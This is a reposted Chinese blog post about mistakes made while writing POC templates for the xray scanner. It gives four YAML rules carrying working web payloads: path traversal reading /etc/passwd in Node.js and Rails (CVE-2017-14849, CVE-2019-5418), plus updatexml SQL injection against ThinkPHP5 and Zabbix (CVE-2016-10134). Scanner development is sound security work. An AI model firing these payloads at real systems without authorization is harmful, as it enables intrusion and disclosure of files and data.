xray写POC踩坑

本文转载自查看原文 2019-09-13 01:24 496 6_Web安全漏洞及原理/ 4_安全评估/渗透测试

错误记录

静态文件目录不一定是static。
只考虑了linux的情况，如果是 windows 呢，能读取某些应用自己的源码吗。
实际环境参数不一定是id，thinkphp 不适合使用 poc 来写
poc 内容没啥问题，文件名和 poc name有问题 https://travis-ci.org/chaitin/xray/builds/583451463?utm_source=github_status&utm_medium=notification

NodeJS_path-validation_CVE-2017-14849.yml


name: NodeJS_path-validation_CVE-2017-14849
rules:
  - method: GET
    path: /static/../../../a/../../../../etc/passwd
    headers:
      Accept: ''
    follow_redirects: false
    expression: |
      status==200 && body.bcontains(b'root:x:0:0')
detail:
  author: 17bdw
  Affected Version: "NodeJS 8.5.0"
  links:
    - https://github.com/vulhub/vulhub/tree/master/node/CVE-2017-14849

Rails_file_content_disclosure_CVE-2019-5418

name: Rails_file_content_disclosure_CVE-2019-5418
rules:
  - method: GET
    path: /robots
    headers:
      Accept: '../../../../../../../../etc/passwd{{'
    follow_redirects: false
    expression: |
      status==200 && body.bcontains(b'root:x:0:0')
detail:
  author: 17bdw
  Affected Version: "Rails_<6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1"
  links:
    - https://github.com/vulhub/vulhub/tree/master/rails/CVE-2019-5418

thinkphp5-in-sqlinjection

name: thinkphp5-in-sqlinjection
rules:
  - method: GET
    path: /index.php?ids[0,updatexml(0,concat(0xa,MD5(8888)),0)]=1
    expression: |
      body.bcontains(b'cf79ae6addba60ad018347359bd144d')
detail:
  author: 17bdw
  Affected Version: "thinkphp5-in-sqlinjection"
  vuln_url: "/index.php?ids[0,updatexml(0,concat(0xa,MD5(8888)),0)]=1"
  links:
    - https://github.com/vulhub/vulhub/tree/master/thinkphp/in-sqlinjection

zabbix_3.0.3_jsrpc.php_CVE-2016-10134

  
name: zabbix_3.0.3_jsrpc.php_CVE-2016-10134
rules:
  - method: GET
    path: /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,MD5(8888)),0)
    expression: |
      body.bcontains(b'cf79ae6addba60ad018347359bd144d')
detail:
  author: 17bdw
  Affected Version: "zabbix_3.0.3_jsrpc.php_CVE-2016-10134"
  vuln_url: "/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)"
  links:
    - https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134

免责声明！

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 使用 Markdown 写技术博客，踩过的 6个坑用python写注入漏洞的poc 【日常踩坑】导出excel临时目录没有写权限 xray 写flutter项目之一脚一个坑，持续踩坑中 Runtime快游戏调用copyfile接口写临时文件踩坑记录用RUST写流媒体服务器实战——rtmp chunk 踩坑记录 Runtime快游戏调用copyfile接口写临时文件踩坑记录 java反序列化提取payload之xray 高级版的shiro回显poc的提取过程 java反序列化提取payload之Xray高级版的shiro回显poc的提取过程